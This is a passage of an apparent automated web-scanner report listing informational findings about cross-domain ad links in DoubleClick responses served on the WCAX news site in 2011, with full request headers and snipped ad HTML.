Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:29:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 652

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
3B29116611%3B4307-300/250%3B39297696/39315483/1%3B%3B%7Esscs%3D%3fhttp://www.hickokandboardman.com/?utm_source=WCAX&utm_medium=banner&utm_content=video&utm_campaign=wcax%2Bbtv%2Bvideo" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/181371_AM.gif?adID=232524538" WIDTH="300" HEIGHT="250" alt="" title=""></a>
...[SNIP]...
10.24. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/homepage;sz=500x300;wnsz=49;tile=9;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=89441616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:29:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 377

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/r;44306;0-0;0;29116611;1261-500/300;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.25. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/homepage;sz=468x60;wnsz=1;tile=5;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=10981992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:39:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 653

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
29116611%3B1-468/60%3B40072615/40090402/1%3B%3B%7Esscs%3D%3fhttp://www.champlain.edu/Graduate-Studies/Programs/Master-of-Science-in-Managing-Innovation-and-Information-Technology.html" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/186090_AM.jpg?adID=234573319" WIDTH="468" HEIGHT="60" alt="" title=""></a>
...[SNIP]...
10.26. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/homepage;sz=468x60;wnsz=1;tile=5;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=89441616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 621
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:29:30 GMT
Expires: Sat, 09 Apr 2011 12:29:30 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
0/%2a/n%3B231655069%3B0-0%3B0%3B29116611%3B1-468/60%3B39027849/39045606/1%3B%3B%7Esscs%3D%3fhttp://www.hickokandboardman.com/?utm_source=wcax&utm_medium=468X60&utm_campaign=fallbanner" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/179686_AM.gif?adID=231655069" WIDTH="468" HEIGHT="60" alt="" title=""></a>
...[SNIP]...
10.27. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/homepage;sz=468x60;wnsz=1;tile=5;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=19506790? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:31:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 578

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/d%3B234083978%3B1-0%3B0%3B29116611%3B1-468/60%3B41153816/41171603/1%3B%3B%7Esscs%3D%3fhttp://aftermidnightjewelers.com/trollbeads.php" target="_blank"><img border="0" src="http://s0.2mdn.net/1981085/amj-trollbeads-full.jpg?adID=234083978" WIDTH="468" HEIGHT="60" alt="" title=""></a>
...[SNIP]...
10.28. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/homepage;sz=300x250;wnsz=52;tile=4;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=89441616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:29:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 624

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
%2a/m%3B234572744%3B0-0%3B0%3B29116611%3B4307-300/250%3B40072325/40090112/1%3B%3B%7Esscs%3D%3fhttp://www.champlain.edu/Graduate-Studies/Programs/Master-of-Business-Administration.html" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/186074_AM.jpg?adID=234572744" WIDTH="300" HEIGHT="250" alt="" title=""></a>
...[SNIP]...
10.29. http://ad.doubleclick.net/adi/wn.loc.wcax/mostpopular  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/mostpopular

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/mostpopular;sz=94x19;wnsz=88;tile=6;wncc=Most%20Popular;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=89441616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:29:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 376

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/k;44306;0-0;0;49102137;26594-94/19;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.30. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=300x250;wnsz=43;tile=4;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=14408244;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad20=wcax;wnad49=wcax;apptype=platform;env=production;ord=11313361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408244
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 566

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/y%3B237510414%3B0-0%3B0%3B29112185%3B4307-300/250%3B40973307/40991094/1%3B%3B%7Esscs%3D%3fhttp://www.vermontcoinandjewelry.com/" target="_blank"><img border="0" src="http://s0.2mdn.net/3103254/vtcoin-cube2.jpg?adID=237510414" WIDTH="300" HEIGHT="250" alt="" title=""></a>
...[SNIP]...
10.31. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=468x60;wnsz=1;tile=7;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=14408230;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad20=wcax;wnad49=wcax;apptype=platform;env=production;ord=26798968? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408230
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:59:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 622

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
/%2a/j%3B234573030%3B0-0%3B0%3B29112185%3B1-468/60%3B40072482/40090269/1%3B%3B%7Esscs%3D%3fhttp://www.champlain.edu/Graduate-Studies/Programs/Masters-in-Early-Childhood-Education.html" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/186087_AM.jpg?adID=234573030" WIDTH="468" HEIGHT="60" alt="" title=""></a>
...[SNIP]...
10.32. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/wn.loc.wcax/news;sz=300x250;wnsz=43;tile=4;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=14408230;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad20=wcax;wnad49=wcax;apptype=platform;env=production;ord=26798968? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408230
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:59:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 634

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script>
var gfEbForceStreaming = 1;

</script>
<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2326411&PluID=0&w=300&h=250&ord=[timestamp]&ucm=true"></script>
<noscript>
<a href="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=brd&FlightID=2326411&Page=&PluID=0&Pos=320" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2326411&Page=&PluID=0&Pos=320" border=0 width=300 height=250></a>
...[SNIP]...
10.33. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=728x90;wnsz=41;tile=2;wncc=News;wnpt=L;wnpc=linksplus;wncp=WCAX;wncid=408799;wnad85=wcax;wnad41=wcax;wnad1=wcax;apptype=platform;env=production;ord=56917644? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=408799
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 622

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
/%2a/k%3B234572879%3B0-0%3B0%3B29112185%3B3454-728/90%3B40072383/40090170/1%3B%3B%7Esscs%3D%3fhttp://www.champlain.edu/Graduate-Studies/Programs/Master-of-Business-Administration.html" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/186076_AM.jpg?adID=234572879" WIDTH="728" HEIGHT="90" alt="" title=""></a>
...[SNIP]...
10.34. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=300x250;wnsz=43;tile=4;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=465801;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=40324480? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=465801
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:40:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 652

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
3B29112185%3B4307-300/250%3B39297696/39315483/1%3B%3B%7Esscs%3D%3fhttp://www.hickokandboardman.com/?utm_source=WCAX&utm_medium=banner&utm_content=video&utm_campaign=wcax%2Bbtv%2Bvideo" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/181371_AM.gif?adID=232524538" WIDTH="300" HEIGHT="250" alt="" title=""></a>
...[SNIP]...
10.35. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=468x60;wnsz=1;tile=3;wncc=News;wnpt=L;wnpc=linksplus;wncp=WCAX;wncid=408799;wnad85=wcax;wnad41=wcax;wnad1=wcax;apptype=platform;env=production;ord=56917644? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=408799
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 560

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/a%3B237510657%3B0-0%3B0%3B29112185%3B1-468/60%3B40973359/40991146/1%3B%3B%7Esscs%3D%3fhttp://www.vermontcoinandjewelry.com/" target="_blank"><img border="0" src="http://s0.2mdn.net/3103254/vtcoin-full.gif?adID=237510657" WIDTH="468" HEIGHT="60" alt="" title=""></a>
...[SNIP]...
10.36. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=468x60;wnsz=1;tile=7;wncc=News;wnpt=C;wnpc=category;wncp=WCAX;wncid=18197;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_188169=wcax;wnad88_50966=wcax;wnad88_50910=wcax;wnad49=wcax;apptype=platform;env=production;ord=19818295? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 637

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
B238054236%3B0-0%3B0%3B29112185%3B1-468/60%3B41100428/41118215/1%3B%3B%7Esscs%3D%3fhttp://www.vermontcorporatecollege.com?utm_campaign=vcc-spring2011&utm_source=wcax&utm_medium=banner" target="_blank"><img border="0" src="http://s0.2mdn.net/3127317/VTCC4620-Banner-Ad-468X60.gif?adID=238054236" WIDTH="468" HEIGHT="60" alt="" title=""></a>
...[SNIP]...
10.37. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=300x250;wnsz=52;tile=5;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=14408230;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad20=wcax;wnad49=wcax;apptype=platform;env=production;ord=26798968? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408230
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:59:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 598

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
ick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/n%3B213798723%3B2-0%3B0%3B29112185%3B4307-300/250%3B30975971/30993847/1%3B%3B%7Esscs%3D%3fhttp://www.rrmc.org/health_resources/community_education/" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/134910_AM.gif?adID=213798723" WIDTH="300" HEIGHT="250" alt="RRMC" title="RRMC"></a>
...[SNIP]...
10.38. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

